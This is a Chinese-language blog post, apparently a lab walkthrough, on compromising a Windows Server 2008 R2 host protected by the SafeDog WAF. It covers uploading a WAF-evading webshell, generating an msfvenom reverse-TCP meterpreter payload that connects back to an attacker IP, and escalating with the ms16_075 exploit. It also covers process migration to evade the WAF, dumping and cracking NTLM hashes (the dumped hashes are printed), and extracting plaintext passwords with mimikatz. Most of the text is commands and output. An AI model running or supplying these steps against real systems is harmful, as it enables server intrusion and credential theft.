提权安全狗服务器

摘要

1、简介

 

服务器 (vps)上安装了iis安全狗 服务器安全狗通常这种服务器都是比较难提权 不仅是漏洞补丁修复得差不多,waf 对于常规的提权方法也是拦截得较多。

aspx大马 被查杀 拦截 不能访问所以要用内部过waf的 暗月过狗刀 基本过一切waf

中国菜刀 一句话 客户端 菜刀发送的包里面包含eval特征会被waf拦截,服务端一句话一般都会拦截。除了做了一些变异。

现在的测试环境

环境是 Microsoft Windows Web Server 2008 R2

WEB环境 php asp aspx

数据库mysql


iis安全狗 服务器安全狗都是安装默认的设置。

大马的拦截

1.png

 

2、提权过程

 


使用过狗刀过iis安全狗

http://www.moondemo.com/c32as.aspx c32as


 2.png

执行简单的命令

3.png

 

使用CVE-2014-4113-Exploit 提权失败

4.png

 

提权失败 没有提权system权限 使用metasploit提权
生成攻击载核

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134  lport=12345 -f exe >/var/www/html/s.exe


监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost192.168.0.134
set lport 12345
exploit

5.png

查看当前的用户 iis

使用检测提权的模块

use post/multi/recon/local_exploit_suggester

set session 1

exploit

6.png

7.png

 

使用ms16_075提权
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
查看当前权限
getui

8.png

 

安全狗的一些进程
C:\Program Files(x86)\SafeDog\SafeDogSiteIIS\SafeDogSiteIIS.exe
C:\Program Files(x86)\SafeDog\SafeDogServer\SafeDogTray.exe
migrate 1596  迁移进程 注入到其他进程里面
获取获取hash
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
moon:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
moon123:1005:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:5119ef7093e8490f9564144bc3160a29:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:db1b07ef2d6b61fed7fa7e44f44caba1:::
zero:1004:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

假如不能获取hash 就用

getsystem 获取系统权限


run post/windows/gather/smart_hashdump

 

9.png

aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
32ed87bdb5fdc5e9cba88547376818d4
拿到cmd5上是解密

10.png

 

run getgui -u zero-p 123456
增加超级管理用户到服务器上 这种模式服务器安全狗会拦截

获取明文加载mimikatz模块
load mimikatz
获取铭文hash
msv
获取明文密码
Kerberos

 

11.png

假如上面获取不到明文
另外一种方法获取hash
mimikatz_command -f samdump::hashes

mimikatz_command-f sekurlsa::searchPasswords

12.png用wdigest命令获取明文
wdigest
tspkg

13.png


登录远程终端

14.png

目前评论:0 条

发表评论